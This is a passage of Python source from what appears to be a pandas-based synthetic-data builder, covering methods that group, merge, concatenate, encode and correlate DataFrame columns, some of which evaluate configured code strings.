:param remove_aggregated: (optional) if used in conjunction with the weighting then drops the aggregator column
:param remove_weighting_zeros: (optional) removes zero values
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
freq_precision = freq_precision if isinstance(freq_precision, int) else 3
aggregator = aggregator if isinstance(aggregator, str) else 'sum'
headers = Commons.list_formatter(headers)
group_by = Commons.list_formatter(group_by)
df_sub = Commons.filter_columns(canonical, headers=headers + group_by).dropna()
if aggregator.startswith('set') or aggregator.startswith('list'):
df_tmp = df_sub.groupby(group_by)[headers[0]].apply(eval(aggregator)).apply(lambda x: list(x))
df_tmp = df_tmp.reset_index()
for idx in range(1, len(headers)):
result = df_sub.groupby(group_by)[headers[idx]].apply(eval(aggregator)).apply(lambda x: list(x))
df_tmp = df_tmp.merge(result, how='left', left_on=group_by, right_index=True)
for idx in range(len(headers)):
header = headers[idx]
if isinstance(list_choice, int):
df_tmp[header] = df_tmp[header].apply(lambda x: generator.choice(x, size=list_choice))
if isinstance(list_max, int):
df_tmp[header] = df_tmp[header].apply(lambda x: x[0] if list_max == 1 else x[:list_max])
df_sub = df_tmp
else:
df_sub = df_sub.groupby(group_by, as_index=False).agg(aggregator)
if include_weighting:
df_sub['sum'] = df_sub.sum(axis=1, numeric_only=True)
total = df_sub['sum'].sum()
df_sub['weighting'] = df_sub['sum'].\
apply(lambda x: round((x / total), freq_precision) if isinstance(x, (int, float)) else 0)
df_sub = df_sub.drop(columns='sum')
if remove_weighting_zeros:
df_sub = df_sub[df_sub['weighting'] > 0]
df_sub = df_sub.sort_values(by='weighting', ascending=False)
if remove_aggregated:
df_sub = df_sub.drop(headers, axis=1)
if drop_group_by:
df_sub = df_sub.drop(columns=group_by, errors='ignore')
return df_sub
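# Illustrative call (a sketch; the column names are assumptions): total spend per customer with a weighting column
#   self._model_group(canonical=df, headers='spend', group_by='customer_id', aggregator='sum',
#                     include_weighting=True)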
def _model_merge(self, canonical: Any, other: Any, left_on: str=None, right_on: str=None,
on: str=None, how: str=None, headers: list=None, suffixes: tuple=None, indicator: bool=None,
validate: str=None, seed: int=None) -> pd.DataFrame:
""" returns the full column values directly from another connector data source. The indicator parameter can be
used to mark the merged items.
:param canonical: a pd.DataFrame as the reference dataframe
:param other: a direct or generated pd.DataFrame. see context notes below
:param left_on: the canonical key column(s) to join on
:param right_on: the merging dataset key column(s) to join on
:param on: if the left and right join have the same header name this can replace left_on and right_on
:param how: (optional) One of 'left', 'right', 'outer', 'inner'. Defaults to inner. See below for more detailed
description of each method.
:param headers: (optional) a filter on the headers included from the right side
:param suffixes: (optional) A tuple of string suffixes to apply to overlapping columns. Defaults ('', '_dup').
:param indicator: (optional) Add a column to the output DataFrame called _merge with information on the source
of each row. _merge is Categorical-type and takes on a value of left_only for observations whose
merge key only appears in 'left' DataFrame or Series, right_only for observations whose merge key
only appears in 'right' DataFrame or Series, and both if the observation’s merge key is found
in both.
:param validate: (optional) validate : string, default None. If specified, checks if merge is of specified type.
“one_to_one” or “1:1”: checks if merge keys are unique in both left and right datasets.
“one_to_many” or “1:m”: checks if merge keys are unique in left dataset.
“many_to_one” or “m:1”: checks if merge keys are unique in right dataset.
“many_to_many” or “m:m”: allowed, but does not result in checks.
:param seed: this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
The other is a pd.DataFrame, a pd.Series, int or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
"""
# Code block for intent
canonical = self._get_canonical(canonical)
other = self._get_canonical(other, size=canonical.shape[0])
_seed = self._seed() if seed is None else seed
how = how if isinstance(how, str) and how in ['left', 'right', 'outer', 'inner'] else 'inner'
indicator = indicator if isinstance(indicator, bool) else False
suffixes = suffixes if isinstance(suffixes, tuple) and len(suffixes) == 2 else ('', '_dup')
# Filter on the columns
if isinstance(headers, list):
headers.append(right_on if isinstance(right_on, str) else on)
other = Commons.filter_columns(other, headers=headers)
df_rtn = pd.merge(left=canonical, right=other, how=how, left_on=left_on, right_on=right_on, on=on,
suffixes=suffixes, indicator=indicator, validate=validate)
return df_rtn
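# Illustrative call (a sketch; the frames and the key/column names are assumptions):
#   self._model_merge(canonical=df_orders, other=df_customers, on='customer_id', how='left',
#                     headers=['segment'], indicator=True)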
def _model_concat(self, canonical: Any, other: Any, as_rows: bool=None, headers: [str, list]=None,
drop: bool=None, dtype: [str, list]=None, exclude: bool=None, regex: [str, list]=None,
re_ignore_case: bool=None, shuffle: bool=None, seed: int=None) -> pd.DataFrame:
""" returns the full column values directly from another connector data source.
:param canonical: a pd.DataFrame as the reference dataframe
:param other: a direct or generated pd.DataFrame. see context notes below
:param as_rows: (optional) how to concatenate, True adds the connector dataset as rows, False as columns
:param headers: (optional) a filter of headers from the 'other' dataset
:param drop: (optional) to drop or not drop the headers if specified
:param dtype: (optional) a filter on data type for the 'other' dataset. int, float, bool, object
:param exclude: (optional) to exclude or include the data types if specified
:param regex: (optional) a regular expression to search the headers. example '^((?!_amt).)*$' excludes '_amt'
:param re_ignore_case: (optional) true if the regex should ignore case. Default is False
:param shuffle: (optional) if the rows in the loaded canonical should be shuffled
:param seed: this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
The other is a pd.DataFrame, a pd.Series, int or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.Dataframe. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
"""
canonical = self._get_canonical(canonical)
other = self._get_canonical(other, size=canonical.shape[0])
_seed = self._seed() if seed is None else seed
shuffle = shuffle if isinstance(shuffle, bool) else False
as_rows = as_rows if isinstance(as_rows, bool) else False
# Filter on the columns
df_rtn = Commons.filter_columns(df=other, headers=headers, drop=drop, dtype=dtype, exclude=exclude,
regex=regex, re_ignore_case=re_ignore_case, copy=False)
if shuffle:
df_rtn = df_rtn.sample(frac=1, random_state=_seed).reset_index(drop=True)
if canonical.shape[0] <= df_rtn.shape[0]:
df_rtn = df_rtn.iloc[:canonical.shape[0]]
axis = 'index' if as_rows else 'columns'
return pd.concat([canonical, df_rtn], axis=axis)
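# Illustrative call (a sketch; 'df_extra' and its 'score' column are assumptions): append columns trimmed to size
#   self._model_concat(canonical=df, other=df_extra, as_rows=False, headers=['score'], shuffle=True)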
def _model_dict_column(self, canonical: Any, header: str, convert_str: bool=None, replace_null: Any=None,
seed: int=None) -> pd.DataFrame:
""" takes a column that contains dict and expands them into columns. Note, the column must be a flat dictionary.
Complex structures will not work.
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header of the column to be convert
:param convert_str: (optional) if the header has the dict as a string convert to dict using ast.literal_eval()
:param replace_null: (optional) after conversion, replace null values with this value
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: pd.DataFrame
"""
canonical = self._get_canonical(canonical)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = self._seed() if seed is None else seed
convert_str = convert_str if isinstance(convert_str, bool) else False
# replace NaN with '{}' if the column is strings, otherwise replace with {}
if convert_str:
canonical[header] = canonical[header].fillna('{}').apply(ast.literal_eval)
else:
canonical[header] = canonical[header].fillna({i: {} for i in canonical.index})
# convert the key/values into columns (this is the fastest approach)
result = pd.json_normalize(canonical[header])
if isinstance(replace_null, (int, float, str)):
result.replace(np.nan, replace_null, inplace=True)
return canonical.join(result).drop(columns=[header])
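# Illustrative call (a sketch; the 'attributes' column is assumed to hold stringified flat dicts):
#   self._model_dict_column(canonical=df, header='attributes', convert_str=True, replace_null=0)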
def _model_explode(self, canonical: Any, header: str, seed: int=None) -> pd.DataFrame:
""" takes a single column of list values and explodes the DataFrame so row is represented by each elements
in the row list
:param canonical: a pd.DataFrame as the reference dataframe
:param header: the header of the column to be exploded
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
The canonical is a pd.DataFrame, a pd.Series or list, a connector contract str reference or a set of
parameter instructions on how to generate a pd.DataFrame (see the other model methods for a description of each).
"""
canonical = self._get_canonical(canonical)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
_seed = self._seed() if seed is None else seed
return canonical.explode(column=header, ignore_index=True)
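# Illustrative call (a sketch; the 'tags' list column is an assumption): one row per element of 'tags'
#   self._model_explode(canonical=df, header='tags')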
def _model_sample(self, canonical: Any, sample: Any, columns_list: list=None, exclude_associate: list=None,
auto_transition: bool=None, detail_numeric: bool=None, strict_typing: bool=None,
category_limit: int=None, apply_bias: bool=None, seed: int = None) -> pd.DataFrame:
""" Takes a sample dataset and using analytics, builds a set of synthetic columns that are representative of
the sample but scaled to the size of the canonical
:param canonical: a direct or generated pd.DataFrame. see context notes in the other model methods
:param sample: the sample dataset to take the analytics from
:param columns_list: (optional) a list of sample columns to analyse, defaults to all sample columns
:param exclude_associate: (optional) a list of associations to exclude from the analysis
:param auto_transition: (optional) if the sample should be auto transitioned before analysis. Default True
:param detail_numeric: (optional) passed to the association analysis, analyse numeric columns in detail
:param strict_typing: (optional) passed to the association analysis, apply strict typing
:param category_limit: (optional) passed to the association analysis, a limit on category counts
:param apply_bias: (optional) if dominant values have been excluded, re-include to maintain bias
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
sample = self._get_canonical(sample)
auto_transition = auto_transition if isinstance(auto_transition, bool) else True
columns_list = columns_list if isinstance(columns_list, list) else list(sample.columns)
sample = Commons.filter_columns(sample, headers=columns_list)
if auto_transition:
Transition.from_memory().cleaners.auto_transition(sample, inplace=True)
blob = DataDiscovery.analyse_association(sample, columns_list=columns_list, exclude_associate=exclude_associate,
detail_numeric=detail_numeric, strict_typing=strict_typing,
category_limit=category_limit)
return self._model_analysis(canonical=canonical, analytics_blob=blob, apply_bias=apply_bias, seed=seed)
def _model_script(self, canonical: Any, script_contract: str, seed: int = None) -> pd.DataFrame:
"""Takes a synthetic build script and using analytics, builds a set of synthetic columns that are that are
defined by the build script and scaled to the size of the canonical
:param canonical:
:param script_contract:
:param seed: (optional) this is a place holder, here for compatibility across methods
:return: a pd.DataFrame
"""
canonical = self._get_canonical(canonical)
script = self._get_canonical(script_contract)
type_options = {'number': '_get_number', 'date': '_get_datetime', 'category': 'get_category',
'selection': 'get_selection', 'intervals': 'get_intervals', 'distribution': 'get_distribution'}
script['params'] = script['params'].replace(['', ' '], np.nan)
script['params'].loc[script['params'].isna()] = '[]'
script['params'] = [ast.literal_eval(x) if isinstance(x, str) and x.startswith('[') and x.endswith(']')
else x for x in script['params']]
# replace all other items with list
script['params'] = [x if isinstance(x, list) else [x] for x in script['params']]
script['params'] = script['params'].astype('object')
for index, row in script.iterrows():
method = type_options.get(row['type'])
params = row['params']
canonical[row['name']] = eval(f"self.{method}(size={canonical.shape[0]}, **params)", globals(), locals())
return canonical
def _model_analysis(self, canonical: Any, analytics_blob: dict, apply_bias: bool=None,
seed: int=None) -> pd.DataFrame:
""" builds a set of columns based on an analysis dictionary of weighting (see analyse_association)
if a reference DataFrame is passed then as the analysis is run if the column already exists the row
value will be taken as the reference to the sub category and not the random value. This allows already
constructed association to be used as reference for a sub category.
:param canonical: a pd.DataFrame as the reference dataframe
:param analytics_blob: the analytics blob from DataDiscovery.analyse_association(...)
:param apply_bias: (optional) if dominant values have been excluded, re-include to maintain bias
:param seed: seed: (optional) a seed value for the random function: default to None
:return: a DataFrame
"""
def get_level(analysis: dict, sample_size: int, _seed: int=None):
_seed = self._seed(seed=_seed, increment=True)
for name, values in analysis.items():
if row_dict.get(name) is None:
row_dict[name] = list()
_analysis = DataAnalytics(analysis=values.get('insight', {}))
result_type = object
if str(_analysis.intent.dtype).startswith('cat'):
result_type = 'category'
result = self._get_category(selection=_analysis.intent.categories,
relative_freq=_analysis.patterns.get('relative_freq', None),
seed=_seed, size=sample_size)
elif str(_analysis.intent.dtype).startswith('num'):
result_type = 'int' if _analysis.params.precision == 0 else 'float'
result = self._get_intervals(intervals=[tuple(x) for x in _analysis.intent.intervals],
relative_freq=_analysis.patterns.get('relative_freq', None),
precision=_analysis.params.get('precision', None),
seed=_seed, size=sample_size)
elif str(_analysis.intent.dtype).startswith('date'):
result_type = 'object' if _analysis.params.is_element('data_format') else 'date'
result = self._get_datetime(start=_analysis.stats.lowest,
until=_analysis.stats.highest,
relative_freq=_analysis.patterns.get('relative_freq', None),
date_format=_analysis.params.get('data_format', None),
day_first=_analysis.params.get('day_first', None),
year_first=_analysis.params.get('year_first', None),
seed=_seed, size=sample_size)
else:
result = []
                # if the analysis was done excluding dominant values, see if they should be added back
if apply_bias and _analysis.patterns.is_element('dominant_excluded'):
_dom_percent = _analysis.patterns.dominant_percent/100
_dom_values = _analysis.patterns.dominant_excluded
if len(_dom_values) > 0:
s_values = pd.Series(result, dtype=result_type)
non_zero = s_values[~s_values.isin(_dom_values)].index
choice_size = int((s_values.size * _dom_percent) - (s_values.size - len(non_zero)))
if choice_size > 0:
generator = np.random.default_rng(_seed)
_dom_choice = generator.choice(_dom_values, size=choice_size)
s_values.iloc[generator.choice(non_zero, size=choice_size, replace=False)] = _dom_choice
result = s_values.to_list()
# now add the result to the row_dict
row_dict[name] += result
if sum(_analysis.patterns.relative_freq) == 0:
unit = 0
else:
unit = sample_size / sum(_analysis.patterns.relative_freq)
if values.get('sub_category'):
leaves = values.get('branch', {}).get('leaves', {})
for idx in range(len(leaves)):
section_size = int(round(_analysis.patterns.relative_freq[idx] * unit, 0)) + 1
next_item = values.get('sub_category').get(leaves[idx])
get_level(next_item, section_size, _seed)
return
canonical = self._get_canonical(canonical)
apply_bias = apply_bias if isinstance(apply_bias, bool) else True
row_dict = dict()
seed = self._seed() if seed is None else seed
size = canonical.shape[0]
get_level(analytics_blob, sample_size=size, _seed=seed)
for key in row_dict.keys():
row_dict[key] = row_dict[key][:size]
return pd.concat([canonical, pd.DataFrame.from_dict(data=row_dict)], axis=1)
def _model_encoding(self, canonical: Any, headers: [str, list], encoding: bool=None, ordinal: dict=None,
prefix=None, dtype: Any=None, prefix_sep: str=None, dummy_na: bool=False,
drop_first: bool=False, seed: int=None) -> pd.DataFrame:
""" encodes categorical data types, by default, as dummy encoded but optionally can choose label
encoding
:param canonical: a pd.DataFrame as the reference dataframe
:param headers: the header(s) to apply multi-hot
:param encoding: the type of encoding to apply to the categories, types supported 'dummy', 'ordinal', 'label'
:param ordinal: a dictionary of ordinal encoding. encoding must be 'ordinal', if not mapped then returns null
:param prefix : str, list of str, or dict of str, default None
String to append DataFrame column names.
Pass a list with length equal to the number of columns
when calling get_dummies on a DataFrame. Alternatively, `prefix`
can be a dictionary mapping column names to prefixes.
:param prefix_sep : str, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix`.
:param dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
:param drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
:param dtype : dtype, default np.uint8
Data type for new columns. Only a single dtype is allowed.
:param seed: seed: (optional) a seed value for the random function: default to None
:return: a pd.Dataframe
"""
        # intent code block on the canonical
canonical = self._get_canonical(canonical)
headers = Commons.list_formatter(headers)
seed = self._seed() if seed is None else seed
encoding = encoding if isinstance(encoding, str) and encoding in ['label', 'ordinal'] else 'dummy'
prefix = prefix if isinstance(prefix, str) else None
prefix_sep = prefix_sep if isinstance(prefix_sep, str) else "_"
dummy_na = dummy_na if isinstance(dummy_na, bool) else False
drop_first = drop_first if isinstance(drop_first, bool) else False
dtype = dtype if dtype else np.uint8
for header in headers:
if canonical[header].dtype.name != 'category':
canonical[header] = canonical[header].astype('category')
if encoding == 'ordinal':
ordinal = ordinal if isinstance(ordinal, dict) else {}
                canonical[header] = canonical[header].map(ordinal, na_action='ignore')
elif encoding == 'label':
canonical[f"{prefix}{prefix_sep}{header}"] = canonical[header].cat.codes
if encoding == 'dummy':
dummy_df = pd.get_dummies(canonical, columns=headers, prefix=prefix, prefix_sep=prefix_sep,
dummy_na=dummy_na, drop_first=drop_first, dtype=dtype)
for name in dummy_df.columns:
canonical[name] = dummy_df[name]
return canonical
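    # --- Editor's note: a minimal, hypothetical sketch (not part of the original source) of the dummy
    # (one-hot) path used above; the frame `df` and prefix values are illustrative only:
    #   df = pd.DataFrame({'gender': ['M', 'F', 'M']})
    #   pd.get_dummies(df, columns=['gender'], prefix='enc', prefix_sep='_', dtype=np.uint8)
    #   # -> adds 0/1 flag columns 'enc_F' and 'enc_M'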
def _correlate_selection(self, canonical: Any, selection: list, action: [str, int, float, dict],
default_action: [str, int, float, dict]=None, seed: int=None, rtn_type: str=None):
""" returns a value set based on the selection list and the action enacted on that selection. If
the selection criteria is not fulfilled then the default_action is taken if specified, else null value.
If a DataFrame is not passed, the values column is referenced by the header '_default'
:param canonical: a pd.DataFrame as the reference dataframe
:param selection: a list of selections where conditions are filtered on, executed in list order
An example of a selection with the minimum requirements is: (see 'select2dict(...)')
[{'column': 'genre', 'condition': "=='Comedy'"}]
:param action: a value or dict to act upon if the select is successful. see below for more examples
An example of an action as a dict: (see 'action2dict(...)')
{'method': 'get_category', 'selection': ['M', 'F', 'U']}
:param default_action: (optional) a default action to take if the selection is not fulfilled
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: value set based on the selection list and the action
Selections are a list of dictionaries of conditions and optional additional parameters to filter.
To help build conditions there is a static helper method called 'select2dict(...)' that has parameter
options available to build a condition.
An example of a condition with the minimum requirements is
[{'column': 'genre', 'condition': "=='Comedy'"}]
an example of using the helper method
selection = [inst.select2dict(column='gender', condition="=='M'"),
inst.select2dict(column='age', condition=">65", logic='XOR')]
Using the 'select2dict' method ensure the correct keys are used and the dictionary is properly formed. It also
helps with building the logic that is executed in order
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
        that executes an intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
{'method': 'get_category', selection: ['M', 'F', 'U']}
This same action using the helper method would look like:
inst.action2dict(method='get_category', selection=['M', 'F', 'U'])
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical)
if len(canonical) == 0:
raise TypeError("The canonical given is empty")
if not isinstance(selection, list):
raise ValueError("The 'selection' parameter must be a 'list' of 'dict' types")
if not isinstance(action, (str, int, float, dict)) or (isinstance(action, dict) and len(action) == 0):
raise TypeError("The 'action' parameter is not of an accepted format or is empty")
_seed = seed if isinstance(seed, int) else self._seed()
# prep the values to be a DataFrame if it isn't already
action = deepcopy(action)
selection = deepcopy(selection)
# run the logic
select_idx = self._selection_index(canonical=canonical, selection=selection)
if not isinstance(default_action, (str, int, float, dict)):
default_action = None
rtn_values = self._apply_action(canonical, action=default_action, seed=_seed)
# deal with categories
is_category = False
if rtn_values.dtype.name == 'category':
is_category = True
rtn_values = rtn_values.astype('object')
rtn_values.update(self._apply_action(canonical, action=action, select_idx=select_idx, seed=_seed))
if is_category:
rtn_values = rtn_values.astype('category')
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
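    # --- Editor's note: a hypothetical sketch (not part of the original source) of what the selection/action
    # pattern above reduces to in plain pandas; the frame and values are illustrative only:
    #   df = pd.DataFrame({'genre': ['Comedy', 'Drama']})
    #   select_idx = df[df['genre'] == 'Comedy'].index          # the selection step
    #   out = pd.Series('other', index=df.index)                # the default_action
    #   out.loc[select_idx] = 'funny'                           # the action applied to the selection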
def _correlate_custom(self, canonical: Any, code_str: str, seed: int=None, **kwargs):
""" Commonly used for custom list comprehension, takes code string that when evaluated returns a list of values
When referencing the canonical in the code_str it should be referenced either by use parameter label 'canonical'
or the short cut '@' symbol.
for example:
code_str = "[x + 2 for x in @['A']]" # where 'A' is a header in the canonical
kwargs can also be passed into the code string but must be preceded by a '$' symbol
for example:
code_str = "[True if x == $v1 else False for x in @['A']]" # where 'v1' is a kwargs
:param canonical: a pd.DataFrame as the reference dataframe
:param code_str: an action on those column values. to reference the canonical use '@'
:param seed: (optional) a seed value for the random function: default to None
:param kwargs: a set of kwargs to include in any executable function
        :return: a list (optionally a pd.DataFrame)
"""
canonical = self._get_canonical(canonical)
_seed = seed if isinstance(seed, int) else self._seed()
local_kwargs = locals()
for k, v in local_kwargs.pop('kwargs', {}).items():
local_kwargs.update({k: v})
code_str = code_str.replace(f'${k}', str(v))
code_str = code_str.replace('@', 'canonical')
rtn_values = eval(code_str, globals(), local_kwargs)
if rtn_values is None:
return [np.nan] * canonical.shape[0]
return rtn_values
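    # --- Editor's note: a minimal sketch (not part of the original source) of how the '@' substitution
    # above resolves; the frame and expression are illustrative only:
    #   canonical = pd.DataFrame({'A': [1, 2, 3]})
    #   code_str = "[x + 2 for x in @['A']]".replace('@', 'canonical')
    #   eval(code_str)                                           # -> [3, 4, 5]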
def _correlate_aggregate(self, canonical: Any, headers: list, agg: str, seed: int=None, precision: int=None,
rtn_type: str=None):
""" correlate two or more columns with each other through a finite set of aggregation functions. The
aggregation function names are limited to 'sum', 'prod', 'count', 'min', 'max' and 'mean' for numeric columns
and a special 'list' function name to combine the columns as a list
:param canonical: a pd.DataFrame as the reference dataframe
:param headers: a list of headers to correlate
        :param agg: the aggregation function name to enact. The available functions are:
'sum', 'prod', 'count', 'min', 'max', 'mean' and 'list' which combines the columns as a list
:param precision: the value precision of the return values
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
"""
canonical = self._get_canonical(canonical)
if not isinstance(headers, list) or len(headers) < 2:
raise ValueError("The headers value must be a list of at least two header str")
if agg not in ['sum', 'prod', 'count', 'min', 'max', 'mean', 'list']:
raise ValueError("The only allowed func values are 'sum', 'prod', 'count', 'min', 'max', 'mean', 'list'")
# Code block for intent
_seed = seed if isinstance(seed, int) else self._seed()
precision = precision if isinstance(precision, int) else 3
if agg == 'list':
return canonical.loc[:, headers].values.tolist()
rtn_values = eval(f"canonical.loc[:, headers].{agg}(axis=1)", globals(), locals()).round(precision)
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
rtn_values = rtn_values.astype(rtn_type)
return rtn_values
return rtn_values.to_list()
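    # --- Editor's note: a minimal sketch (not part of the original source) of the row-wise aggregation
    # above; the frame is illustrative only:
    #   df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    #   df.loc[:, ['a', 'b']].sum(axis=1).round(3)               # agg='sum'  -> 4, 6
    #   df.loc[:, ['a', 'b']].values.tolist()                    # agg='list' -> [[1, 3], [2, 4]]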
def _correlate_choice(self, canonical: Any, header: str, list_size: int=None, random_choice: bool=None,
replace: bool=None, shuffle: bool=None, convert_str: bool=None, seed: int=None,
rtn_type: str=None):
""" correlate a column where the elements of the columns contains a list, and a choice is taken from that list.
if the list_size == 1 then a single value is correlated otherwise a list is correlated
Null values are passed through but all other elements must be a list with at least 1 value in.
if 'random' is true then all returned values will be a random selection from the list and of equal length.
if 'random' is false then each list will not exceed the 'list_size'
Also if 'random' is true and 'replace' is False then all lists must have more elements than the list_size.
By default 'replace' is True and 'shuffle' is False.
In addition 'convert_str' allows lists that have been formatted as a string can be converted from a string
to a list using 'ast.literal_eval(x)'
:param canonical: a pd.DataFrame as the reference dataframe
        :param header: The header containing a list to choose from.
:param list_size: (optional) the number of elements to return, if more than 1 then list
:param random_choice: (optional) if the choice should be a random choice.
:param replace: (optional) if the choice selection should be replaced or selected only once
:param shuffle: (optional) if the final list should be shuffled
:param convert_str: if the header has the list as a string convert to list using ast.literal_eval()
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
# Code block for intent
list_size = list_size if isinstance(list_size, int) else 1
random_choice = random_choice if isinstance(random_choice, bool) else False
convert_str = convert_str if isinstance(convert_str, bool) else False
replace = replace if isinstance(replace, bool) else True
shuffle = shuffle if isinstance(shuffle, bool) else False
_seed = seed if isinstance(seed, int) else self._seed()
s_values = canonical[header].copy()
if s_values.empty:
return list()
s_idx = s_values.where(~s_values.isna()).dropna().index
if convert_str:
s_values.iloc[s_idx] = [ast.literal_eval(x) if isinstance(x, str) else x for x in s_values.iloc[s_idx]]
s_values.iloc[s_idx] = Commons.list_formatter(s_values.iloc[s_idx])
generator = np.random.default_rng(seed=_seed)
if random_choice:
try:
s_values.iloc[s_idx] = [generator.choice(x, size=list_size, replace=replace, shuffle=shuffle)
for x in s_values.iloc[s_idx]]
except ValueError:
raise ValueError(f"Unable to make a choice. Ensure {header} has all appropriate values for the method")
s_values.iloc[s_idx] = [x[0] if list_size == 1 else list(x) for x in s_values.iloc[s_idx]]
else:
s_values.iloc[s_idx] = [x[:list_size] if list_size > 1 else x[0] for x in s_values.iloc[s_idx]]
if isinstance(rtn_type, str):
if rtn_type in ['category', 'object'] or rtn_type.startswith('int') or rtn_type.startswith('float'):
s_values = s_values.astype(rtn_type)
return s_values
return s_values.to_list()
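    # --- Editor's note: a hypothetical sketch (not part of the original source) of the per-row choice
    # above, assuming list values stored as strings (the 'convert_str' case):
    #   s = pd.Series(["[1, 2, 3]", "[4, 5]"]).apply(ast.literal_eval)
    #   rng = np.random.default_rng(42)
    #   s.apply(lambda x: rng.choice(x, size=1, replace=True)[0])   # one random element per row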
def _correlate_join(self, canonical: Any, header: str, action: [str, dict], sep: str=None, seed: int=None,
rtn_type: str=None):
""" correlate a column and join it with the result of the action, This allows for composite values to be
build from. an example might be to take a forename and add the surname with a space separator to create a
composite name field, of to join two primary keys to create a single composite key.
:param canonical: a pd.DataFrame as the reference dataframe
:param header: an ordered list of columns to join
        :param action: a string or a single action whose outcome will be joined to the header value
:param sep: (optional) a separator between the values
:param seed: (optional) a seed value for the random function: default to None
:param rtn_type: (optional) changes the default return of a 'list' to a pd.Series
other than the int, float, category, string and object, passing 'as-is' will return as is
:return: a list of equal length to the one passed
Actions are the resulting outcome of the selection (or the default). An action can be just a value or a dict
        that executes an intent method such as get_number(). To help build actions there is a helper function called
action2dict(...) that takes a method as a mandatory attribute.
With actions there are special keyword 'method' values:
@header: use a column as the value reference, expects the 'header' key
@constant: use a value constant, expects the key 'value'
@sample: use to get sample values, expected 'name' of the Sample method, optional 'shuffle' boolean
@eval: evaluate a code string, expects the key 'code_str' and any locals() required
An example of a simple action to return a selection from a list:
                {'method': 'get_category', selection: ['M', 'F', 'U']}
an example of using the helper method, in this example we use the keyword @header to get a value from another
column at the same index position:
inst.action2dict(method="@header", header='value')
We can even execute some sort of evaluation at run time:
inst.action2dict(method="@eval", code_str='sum(values)', values=[1,4,2,1])
"""
canonical = self._get_canonical(canonical, header=header)
if not isinstance(action, (dict, str)):
raise ValueError(f"The action must be a dictionary of a single action or a string value")
if not isinstance(header, str) or header not in canonical.columns:
raise ValueError(f"The header '{header}' can't be found in the canonical DataFrame")
# Code block for intent
_seed = seed if isinstance(seed, int) else self._seed()
sep = sep if isinstance(sep, str) else ''
s_values = canonical[header].copy()
if s_values.empty:
return list()
action = deepcopy(action)
null_idx = s_values[s_values.isna()].index
        s_values = s_values.astype(str)  # ensure the header values are strings before joining
result = self._apply_action(canonical, action=action, seed=_seed)
s_values = pd.Series([f"{a}{sep}{b}" for (a, b) in zip(s_values, result)], dtype='object')
if null_idx.size > 0:
s_values.iloc[null_idx] = np.nan
if isinstance(rtn_type, str):
